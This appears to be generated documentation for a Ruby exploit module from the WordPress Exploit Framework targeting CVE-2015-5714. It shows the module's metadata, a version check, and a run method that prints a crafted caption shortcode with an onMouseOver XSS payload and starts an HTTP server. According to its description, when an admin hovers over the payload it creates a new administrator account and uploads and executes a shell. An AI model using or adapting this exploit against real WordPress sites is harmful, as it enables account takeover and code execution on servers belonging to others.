class Wpxf::Exploit::Wp43ShortcodeXssShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::Xss::new
# File lib/wpxf/modules/exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload.rb, line 7 def initialize super update_info( name: 'WordPress <= 4.3 Shortcode Stored XSS Shell Upload', desc: 'In version 4.3 and below of WordPress, a stored XSS '\ 'vulnerability exists that allows a user to store a script if '\ 'they have the required permissions to publish a new post.'\ "\n"\ 'This module prepares a shortcode that can be included in a post '\ 'which when hovered over by an admin user will create '\ 'a new admin user which will be used to upload and execute the '\ 'selected payload in the context of the web server.', author: [ 'Shahar Tal', # Discovery and disclosure 'Netanel Rubin', # Discovery and disclosure 'rastating' # WPXF module ], references: [ ['CVE', '2015-5714'], ['WPVDB', '8186'], ['URL', 'https://wordpress.org/news/2015/09/wordpress-4-3-1/'] ], date: 'Sept 15 2015' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload.rb, line 34 def check version = wordpress_version return :unknown if version.nil? return :vulnerable if version < Gem::Version.new('4.3.1') :safe end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload.rb, line 41 def run return false unless super @success = false emit_info 'Create a new post with the below shorttag included:' puts puts "[caption width=\"1\" caption='<a href=\"' \">]</a><a href=\""\ "http://onMouseOver='#{xss_ascii_encoded_include_script}'"\ '">Click Me</a>' puts start_http_server @success end